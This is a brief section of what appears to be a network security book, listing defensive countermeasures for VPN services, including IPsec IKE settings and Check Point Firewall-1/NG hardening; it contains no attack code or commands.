11.5 VPN Services Countermeasures

  • Ensure that firewall or VPN gateway appliances have the latest security hot fixes and service packs installed to minimize the risk of a known publicized attack from being successful.

Here are IPsec-specific countermeasures:

  • Preshared keys used with both main and aggressive mode IKE key exchange mechanisms are open to sniffing and offline brute-force grinding attacks to compromise the shared secret. You should use digital certificates or two-factor authentication mechanisms to negate these risks.

  • Pre-shared keys and aggressive mode IKE support is a recipe for disaster. If you must support aggressive mode IKE, use digital certificates for authentication.

  • Aggressively firewall and filter traffic flowing through VPN tunnels so that, in the event of a compromise, network access is limited. This point is especially important when providing mobile users network access, as opposed to branch offices.

  • Where possible, limit inbound IPsec security associations to specific IP addresses. This ensures that even if an attacker compromises a preshared key, she can't easily access the VPN.

Check Point Firewall-1- and NG-specific countermeasures:

  • Filter access to TCP ports 256 and 264 if they aren't required for remote access through SecuRemote, SecureClient, or similar VPN client software. These ports can be abused to collect user and network topology information.

  • Check Point Firewall-1 and NG are open to active attack to enumerate valid usernames through aggressive mode IKE. If possible, disable aggressive mode support.

  • If you use FWZ VPN tunnels, ensure that the latest Check Point service pack and any relevant security hot fixes are installed to negate circumvention techniques. Due to the fact that RDP runs over UDP, this service is susceptible to various types of spoofing and encapsulation attack.